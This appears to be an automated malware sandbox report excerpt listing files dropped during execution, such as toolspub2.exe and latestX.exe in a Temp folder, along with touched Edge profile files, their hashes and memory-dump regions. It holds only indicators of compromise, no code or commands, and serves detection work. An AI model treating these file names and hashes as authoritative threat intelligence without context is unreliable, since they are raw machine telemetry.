SHA512 569707a69fe926064f748fbcc12485bc76daf2cb186ff5db338c6d0253d667bae8736c1a646efeff1f4afc3988a1e62b6a418389a46cab579e367b194e6670cb

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

MD5 dcbd05276d11111f2dd2a7edf52e3386
SHA1 f5dc6d418d9fb2d2cfa4af440ec4ff78da8f11ec
SHA256 cea5245bab036b03f89d549c71f47df8a14854b0de515643bf95319ec5af71d4
SHA512 5f1a9c993cd5394e23b39c43cc7479355c922d1ee8ea48109bbad805209dee697e20759257eca9e2f1b75d34a8c4b4c428a736fa8a468dc18de6c44cb6394846

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

MD5 c067b4583e122ce237ff22e9c2462f87
SHA1 8a4545391b205291f0c0ee90c504dc458732f4ed
SHA256 a16dbcd03a7549fbaf7cad1bedd01dcb961a5d43c873f1d1a50892618a06662e
SHA512 0767cba9f10154b4e28cf6a55b6fc827a96c4fbc88e2d67acd645a0a7a604a3beb63ea58d7febcf8b17de1ea3d2097e76ceac1b36b9fecf9a0945a31a9e211c3

memory/5512-1075-0x00000251E0C10000-0x00000251E0C66000-memory.dmp

memory/6176-1084-0x0000000000400000-0x00000000004AA000-memory.dmp

memory/5512-1088-0x00000251E0CC0000-0x00000251E0D14000-memory.dmp

memory/6228-1089-0x00007FF82B830000-0x00007FF82C2F1000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\latestX.exe

MD5 bae29e49e8190bfbbf0d77ffab8de59d
SHA1 4a6352bb47c7e1666a60c76f9b17ca4707872bd9
SHA256 f91e4ff7811a5848561463d970c51870c9299a80117a89fb86a698b9f727de87
SHA512 9e6cf6519e21143f9b570a878a5ca1bba376256217c34ab676e8d632611d468f277a0d6f946ab8705121002d96a89274f38458affe3df3a3a1c75e336d7d66e2

memory/6176-1093-0x0000020B7DC00000-0x0000020B7DC10000-memory.dmp

memory/2464-1097-0x0000000004CB0000-0x0000000004CC0000-memory.dmp

memory/1224-1098-0x0000000000B40000-0x0000000000B41000-memory.dmp

memory/6176-1091-0x00007FF82B830000-0x00007FF82C2F1000-memory.dmp

memory/6176-1087-0x0000020B650B0000-0x0000020B65194000-memory.dmp

memory/6176-1100-0x0000020B650B0000-0x0000020B65191000-memory.dmp

memory/6176-1102-0x0000020B650B0000-0x0000020B65191000-memory.dmp

memory/6176-1104-0x0000020B650B0000-0x0000020B65191000-memory.dmp

memory/5812-1105-0x0000000074410000-0x0000000074BC0000-memory.dmp

memory/6176-1107-0x0000020B650B0000-0x0000020B65191000-memory.dmp

memory/6176-1109-0x0000020B650B0000-0x0000020B65191000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index

MD5 f0a8da316800a0ebbec885839d92b3eb
SHA1 c5845ffe46c60efe6acc1982c583306bbe57aac9
SHA256 f4c908cd0f96fbe604f913ddf5974d3d0a3bdacdf20db955b61ce8705cf92f90
SHA512 2517885f549fdcee52569b49414af6a284a18a84f5f9d42c7fbf3f1e4c3ec9a864205e0d07e56f309eea74309e40ea74190973b3d18e7dc5ab2d2c7326b1a81a

memory/6176-1111-0x0000020B650B0000-0x0000020B65191000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index~RFe591c19.TMP

MD5 5062c77da5022fc8ccb1b3a63fe0a3e2
SHA1 5a73aaaad59e8f774428e5522bd049640c4608ce
SHA256 43e5396926538f9bf9dd705805dea71f6a93f07026a3e741e67ea149c58271d0
SHA512 496615211934f0cae46104996ecc9c60c38e00213bbbae2e0c425a5c80e334a52ca699d00da06bfd11066093ed8fd066bec9589303fa89debc9571d335644e67

memory/6176-1122-0x0000020B650B0000-0x0000020B65191000-memory.dmp

memory/6176-1124-0x0000020B650B0000-0x0000020B65191000-memory.dmp

memory/6176-1126-0x0000020B650B0000-0x0000020B65191000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\8f7abdeb3486c1b8780fede76afc20e044eff1b5\6c9a60cc-3d0a-447c-a5bb-878a3d552704\index-dir\the-real-index

MD5 5ed693b31d2deb1caa677c1e15bd4d26
SHA1 b0e4ef68bf7f6917f742386764b7a9990d05debe
SHA256 cc4153137547940276da209a32752ee7ac2591f55590b52e59c3592d977e07fe
SHA512 c3ad727163f77b1448ba1d7f9a21ae0bc6bce2336d18136c41296fbae02447e6df87e00cc68091237fd6ba21645b0539879f40bb3b9641455ee6443d8e56213e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\8f7abdeb3486c1b8780fede76afc20e044eff1b5\6c9a60cc-3d0a-447c-a5bb-878a3d552704\index-dir\the-real-index~RFe59205f.TMP

MD5 a50bbc4d7448ae0483426f6a38444f5b
SHA1 048ed2807ab31fb862c50e865c553d24953349c9
SHA256 031b50686f4b9ce68c4e7045e10694100bbe77ff93a3b809f4cf585867518a23
SHA512 7678ba2e2837a5bf8609147008de0a5f2ef8ec0ebe31e3d07bcf85bdf58ee9aca753177d86bffe3b2d64b71af12e5a3f9adc9c789711c5ccd35cd5b8c49ab595

memory/6176-1128-0x0000020B650B0000-0x0000020B65191000-memory.dmp

memory/6176-1141-0x0000020B650B0000-0x0000020B65191000-memory.dmp

memory/6176-1143-0x0000020B650B0000-0x0000020B65191000-memory.dmp

memory/6176-1145-0x0000020B650B0000-0x0000020B65191000-memory.dmp

memory/6176-1147-0x0000020B650B0000-0x0000020B65191000-memory.dmp

memory/6176-1149-0x0000020B650B0000-0x0000020B65191000-memory.dmp

memory/6176-1151-0x0000020B650B0000-0x0000020B65191000-memory.dmp

memory/6176-1153-0x0000020B650B0000-0x0000020B65191000-memory.dmp

memory/6176-1155-0x0000020B650B0000-0x0000020B65191000-memory.dmp

memory/6176-1157-0x0000020B650B0000-0x0000020B65191000-memory.dmp

memory/6176-1159-0x0000020B650B0000-0x0000020B65191000-memory.dmp

memory/6176-1161-0x0000020B650B0000-0x0000020B65191000-memory.dmp

memory/6176-1163-0x0000020B650B0000-0x0000020B65191000-memory.dmp

memory/6176-1165-0x0000020B650B0000-0x0000020B65191000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

MD5 73d73136aeb6767584376be22abcf958
SHA1 59b012af79284e10d063ab78f768e01dbe72ecde
SHA256 3e42dfcecf175b494dd9d0b912ab311fc3cf7f9ebd1574f8568b659b269f145f
SHA512 b82f18f4abfb037f8e60a5f48ec45787fce3a4b5e3b118565417f476ddae8e0571dbb6ee488311aeb56192e572d31cb34d633a8b2bcca8a0ce63257a9e258847

memory/7636-1232-0x0000000000400000-0x0000000000409000-memory.dmp

memory/8136-1231-0x00000000008E0000-0x00000000008E9000-memory.dmp

memory/8136-1229-0x0000000000A90000-0x0000000000B90000-memory.dmp

memory/3680-1239-0x00000000029B0000-0x0000000002DB8000-memory.dmp

memory/3680-1243-0x0000000002DC0000-0x00000000036AB000-memory.dmp

memory/3680-1249-0x0000000000400000-0x0000000000D1C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_uvcocr1d.ixv.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2416-1270-0x00007FF82B830000-0x00007FF82C2F1000-memory.dmp

memory/2416-1273-0x0000017CD7720000-0x0000017CD7730000-memory.dmp

memory/2416-1277-0x0000017CD7720000-0x0000017CD7730000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

MD5 55eee882aa0e8926000b9fda980671ad
SHA1 6aa81865debb73da40ac6160bdb6b42ad20b333b
SHA256 14b548ced97c34280f666bfad4c2c4b6f2c22cac2c447844bf466934c622bea4
SHA512 3a2aedd07f88828c5a495de403ec4112ab0299d6a26cb31c98c7b364cde711b67fa9bf76eb0c7b4fa5bfe13004f64ccd4dc819e25b005c9a94659a5d42afd30d

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

MD5 1a269889f4c03aed4dbacdd702280af4
SHA1 833540532985ccdd135c4fa6f54347f80e453147
SHA256 4bf5ed6b70dbbf611e998f6e616bf4d4a4701bf251b378b0b8d06be2ee5d9001
SHA512 6d94fb47d1bcd3b0b7f8c11ed96aaf4b554084189767913bd96735e47fa12aa9d36ae8d92d128420622bbf3d47f9928d7dba1ff3982a38f4fe2302fc1007bf52

memory/5512-1293-0x00007FF82B830000-0x00007FF82C2F1000-memory.dmp

memory/2416-1300-0x0000017CD76A0000-0x0000017CD76C2000-memory.dmp

memory/2416-1321-0x0000017CD7720000-0x0000017CD7730000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 5a162f09d2e994d75ece787f55e95b30
SHA1 6ee1a0234ea46e680e49e7f74cc8c8553a942b8b
SHA256 c79b7a3f15952eb336f38916b658dedd788fa7622e63ae17addf29ca4e292887
SHA512 166468ae9afc9e3263dac24440e5acaa5186fdd1997fe9bc5a38b2a44ef4a7fc1aa7bc588091e3d87dae0ef4ab226cc043508e4519a5c74a3e77b818e452d84b

memory/2924-1336-0x0000000003240000-0x0000000003276000-memory.dmp

memory/2924-1340-0x0000000074410000-0x0000000074BC0000-memory.dmp

memory/6176-1344-0x00007FF82B830000-0x00007FF82C2F1000-memory.dmp

memory/6176-1346-0x0000020B7DC00000-0x0000020B7DC10000-memory.dmp

memory/2924-1345-0x0000000005970000-0x0000000005F98000-memory.dmp

memory/2924-1349-0x0000000002EC0000-0x0000000002ED0000-memory.dmp

memory/2924-1351-0x0000000002EC0000-0x0000000002ED0000-memory.dmp

memory/2924-1354-0x0000000005810000-0x0000000005832000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\8f7abdeb3486c1b8780fede76afc20e044eff1b5\index.txt

MD5 2336cbb0feb74268e78183d0df9c5cdf
SHA1 6971b3331cfeaf57c5affb353361ef9e27dd9355
SHA256 133715e8e99f685b2ef2dd69119d40db5f9851ce3b3a7447de0f7a312a33c9ea
SHA512 f64d77d80ad557dedcd9a7bc01ca301e1aae3c5fdc18c6eec64bb2cd2a7752516a7f237e0d119d514b3feb036a146de61009cb5a975978f1ae8a3f6a90abcb2c

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\8f7abdeb3486c1b8780fede76afc20e044eff1b5\0a170473-4d9e-43a8-9fe7-9046e9d6ab35\index-dir\the-real-index

MD5 c11747fd0b37000301776866c407497a
SHA1 736a49e35c71e877b6e8d369179beeae3e791ca8
SHA256 97f4a8708b3052377605656cf37b5df20d5947c756d9fab72c814ade0bdf3f5f
SHA512 202da469b6a38b099bcac3a9dc0af798bb14e485ddabbee86b7c64b74b3bad3916270ca7d9cffb8fc01f9fe8a738c49ea4eb9bd152d617b070bab5d5b01e81b7

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\8f7abdeb3486c1b8780fede76afc20e044eff1b5\0a170473-4d9e-43a8-9fe7-9046e9d6ab35\index-dir\the-real-index~RFe595569.TMP

MD5 2a512756bf11f6e1a91846957b579154
SHA1 a290375c36d3c81bd406e845c5d1dad457136880
SHA256 af198683805353ce2094a2f01e4b100bf0eade3c545b75cbc31e2b81a0bb4c5d
SHA512 36cd2c13d20e6ea622a7a1d8e13adbb023711e248d684de31baf6c1144279df7d74a4b0f11bf8192028385697b2e65f120230536d97548bb34fb9ccfeb2eeefe

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 9e79c112f94c58398ce083a7d13aef1a
SHA1 bba03a52e80fed54d9fa3bd189e6631081ebc5a2
SHA256 e3b710b7f18ad62a1cbf112d16740f6cc0b9a717d09b04b2e959e072a3dac83d
SHA512 1512041957b8e3add45ecfab8ec4a7b4dcb4cb5f13fae0c36c2740d84d29383a651e0c862b95542599644b5eebfe591d50fdfd2fd4f956ac033097e8cfb149ec

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 cf8adb451bb3df8e3cc4681bf3070a8d
SHA1 bf0a4ac90b40ebc53058c502bf6c178a70273220
SHA256 5e7b566c885ad5d69c6f165fecfa5c0da6334ac39e6194af86bd846e86cddb3c
SHA512 c4e180b90b878f606363b89f3575dd2e7d2d044a7dbf991e84a69bc2edd741ea4f84ba92c3f1098dfa747bd83cc60067981acb0bae3f16e591d35f52434cdc2d

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\7a435475-d900-40c7-a4e9-3a5c07b69f1b\index

MD5 54cb446f628b2ea4a5bce5769910512e
SHA1 c27ca848427fe87f5cf4d0e0e3cd57151b0d820d
SHA256 fbcfe23a2ecb82b7100c50811691dde0a33aa3da8d176be9882a9db485dc0f2d
SHA512 8f6ed2e91aed9bd415789b1dbe591e7eab29f3f1b48fdfa5e864d7bf4ae554acc5d82b4097a770dabc228523253623e4296c5023cf48252e1b94382c43123cb0

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

MD5 319a1ee5dfb7f29153789df17b85d63b
SHA1 112adf169470d92d7bfdd33c08b37ba68d34b0e2
SHA256 9eef5fd00aff3fc7e950c12e8e9842670a6226c5ea88009cdf8733a09ae90a47
SHA512 5b92e41e366ef3e7ee90d0841819dc8c043d75504e21efdb80a9d2a42ee48ad63624c274dab991e89c15a077ded880090751c5e41375192a25d16dc6f0e00217

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 0bdea6f3438efb3620a0016fc7dff927
SHA1 c9599ca8a199b944d05ff76e0348113e0e46c33a
SHA256 37bf379c10af329e7c3d7c2cb28c038165e491068e16dd2d5fd0f6b75ec047ea
SHA512 e87ae4b431e716573f55a75d7ec2a613f47da31ab9f308ce6a072ecf5b89004d3f7439f7e0a8f4a2b38486deb3c13fee077812cf4bdd9f9e8241775c01aec542

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 72747240fd33a3607f6f1f83a063f0e3
SHA1 bdcda935f969df4855436a053842c6eb2cfffb20
SHA256 c03d731901f9bbac2ff00d4f493645ed13f4ad0af2db967aae88224ab81cbada
SHA512 2ddde72e40b559061341997e4beb540dd926c5f9efbcd3c456aeae786e8976a1e145432df8ee61537a96c2451d8e57a776999548da35587ba1fbabe43e561b00

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 d45374820d138f039651b218eef50675
SHA1 2e3f734caec4861283e9cca81bc5d73d32803b65
SHA256 eb00613e868c31074935fca59ca0d5d38aa74f22089565eac0df975701b690af
SHA512 51cd7e1fcff6ae0743beb48b2abd3eb790ac76723de9bd4bec5fa114b47d359e66d6e145a9cd32290a9d623125242682927c9c0130363949c46d48b47e26fc00

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

MD5 aff8897aa7d6e3356cb2d3e3b5d0627f
SHA1 ca40c39841cc880622358c8f09769a4585468181
SHA256 d342b4214fc42874b7ac05808d0f4de0648da849c46f1b46b1457f78c5a1d0ea
SHA512 a24e6d0851e8200b697c48213f73ea0fb0ff0d531b23bcddef4a1e707f5a9b1c3fa1c41a10ed55a5f2e4f6ce20076edde05da8baa393c2be03441f604fe66af6